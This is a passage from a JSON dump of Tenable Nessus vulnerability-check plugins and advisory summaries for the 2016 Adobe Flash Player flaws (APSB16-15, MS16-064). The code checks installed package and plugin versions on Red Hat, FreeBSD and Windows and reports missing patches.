script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1079\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.621-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.621-1.el6_8\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:27:24", "description": "Adobe reports :\n\nThese updates resolve type confusion vulnerabilities that could lead to code execution (CVE-2016-1105, CVE-2016-4117).\n\nThese updates resolve use-after-free vulnerabilities that could lead to code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121).\n\nThese updates resolve a heap buffer overflow vulnerability that could lead to code execution (CVE-2016-1101).\n\nThese updates resolve a buffer overflow vulnerability that could lead to code execution (CVE-2016-1103).\n\nThese updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163).\n\nThese updates resolve a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-4116).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "FreeBSD : flash -- multiple vulnerabilities (0c6b008d-35c4-11e6-8e82-002590263bf5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0C6B008D35C411E68E82002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/91697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91697);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"FreeBSD : flash -- multiple vulnerabilities (0c6b008d-35c4-11e6-8e82-002590263bf5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Adobe reports :\n\nThese updates resolve type confusion vulnerabilities that could lead\nto code execution (CVE-2016-1105, CVE-2016-4117).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107,\nCVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\nCVE-2016-4110, CVE-2016-4121).\n\nThese updates resolve a heap buffer overflow vulnerability that could\nlead to code execution (CVE-2016-1101).\n\nThese updates resolve a buffer overflow vulnerability that could lead\nto code execution (CVE-2016-1103).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099,\nCVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\nCVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\nCVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161,\nCVE-2016-4162, CVE-2016-4163).\n\nThese updates resolve a vulnerability in the directory search path\nused to find resources that could lead to code execution\n(CVE-2016-4116).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n # https://vuxml.freebsd.org/freebsd/0c6b008d-35c4-11e6-8e82-002590263bf5.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7ddc0f2e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.621\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.621\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.621\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:17:30", "description": "The remote Windows host is missing KB3163207. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)\n\nNote: KB3163207 replaces KB3157993 which did not address CVE-2016-4117.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-10T00:00:00", "type": "nessus", "title": "MS16-064: Security Update for Adobe Flash Player (3163207)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS16-064.NASL", "href": "https://www.tenable.com/plugins/nessus/91013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91013);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"MSFT\", value:\"MS16-064\");\n script_xref(name:\"MSKB\", value:\"3163207\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS16-064: Security Update for Adobe Flash Player (3163207)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3163207. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\n\nNote: KB3163207 replaces KB3157993 which did not address CVE-2016-4117.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-064\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2012, 8.1, RT 8.1,\n2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS16-064\";\nkbs = make_list(\"3163207\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 18.0.0.343 or 19 < 21.0.0.213\nfix = FALSE;\nif(iver =~ \"^(19|2[01])\\.\" && ver_compare(ver:iver, fix:\"21.0.0.241\", strict:FALSE) <= 0)\n fix = \"21.0.0.242\";\nelse if(ver_compare(ver:iver, fix:\"18.0.0.343\", strict:FALSE) <= 0)\n fix = \"18.0.0.352\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS16-064', kb:'3163207', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:41:36", "description": "Versions of Adobe Flash Player prior to 11.2.202.621, 18.0.0.352, or 21.0.0.242 are outdated and thus unpatched for the following vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted '.dll' file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-15T00:00:00", "type": "nessus", "title": "Flash Player < 11.2.202.621 / 18.0.0.352 / 21.0.0.242 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "9354.PRM", "href": "https://www.tenable.com/plugins/nnm/9354", "sourceData": "Binary data 9354.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:21", "description": "The version of Google Chrome installed on the remote host is prior to 50.0.2661.102, and is affected by multiple vulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to scripts being permitted run while a node is being adopted. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1667)\n - A same-origin bypass vulnerability exists due to a flaw in the Blink V8 bindings. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1668)\n - An overflow condition exists in V8 due to improper validation of user-supplied input. A context-dependent attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-1669)\n - A race condition exists in the loader related to the use of ids. An attacker can exploit this to have an unspecified impact. (CVE-2016-1670)\n\nThe following vulnerabilities affect the bundled version of Flash Player in Chrome :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, 